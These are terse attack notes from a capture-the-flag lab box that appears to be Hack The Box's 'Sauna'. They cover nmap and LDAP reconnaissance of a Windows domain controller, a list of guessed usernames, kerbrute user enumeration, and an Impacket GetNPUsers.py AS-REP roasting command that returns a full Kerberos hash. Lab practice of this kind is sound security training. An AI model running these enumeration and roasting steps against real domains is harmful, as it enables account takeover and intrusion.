PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-01 15:02:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2024-01-01T15:03:18
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
EGOTISTICAL-BANK.LOCAL
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# GetNPUsers.py Egotistical-bank.local/ -dc-ip 10.10.10.175
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
name.txt:
Hsmith
HSmith
HugoSmith
HugoS
Hugo
Hugos
Hugo
./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc EGOTISTICAL-BANK.LOCAL ../Sauna/name.txt
2024/01/01 18:26:44 > [+] VALID USERNAME: [email protected]
name.txt:
FergusSmith
FergusS
FSmith
ChaunCoins
CCoins
ChaunC
HugoBear
HBear
HugoB
BowieTaylor
BTaylor
BowieT
SophieDriver
SophieD
SDriver
StevenKerb
SKerb
StevenK
ShaunCoins
SCoins
ShaunC
../Tool/kerbrute_linux_amd64 userenum --dc EGOTISTICAL-BANK.LOCAL -d EGOTISTICAL-BANK.LOCAL ./name.txt
2024/01/01 19:00:35 > [+] VALID USERNAME: [email protected]
GET TGT by GetNPUsers.py
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# GetNPUsers.py Egotistical-bank.local/fsmith -dc-ip 10.10.10.175 -request -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for fsmith
[email protected]:5e0e4ea398a0894d71ca76e0c72b07d3$5ee7e0d01e133bf7fc14cc6d6ea1f7eccb5bb75ebc36a543ea9250400f9bc239055ca79ddd72bbab93b8de3ad2fa5c177e7dceb70edacdaaa3afe86e5c53082a33956fcf9ee2f76e94b1f3baa692087e1a85ee133fe9b190f79bcf1d45c317eac34642027fb706263a3b76c5b359aa0f40d4bde03289d4068ff134043e8d78ffef3e509a9af8412a0353a88967f9d75feadb092e7dbdd9ac8e7e3adace2c70424349fd9940b94794bbc8f5b00c018aac219fa2c2612d74bb68f210d028837036ebff876d3793dc3821adca3b68608fb50188feb3e256d3da45432abe6247e33d522bf53c9a6962ab264128c267cc82187360d3f7d29c9ea581e1f0d57bdd48c9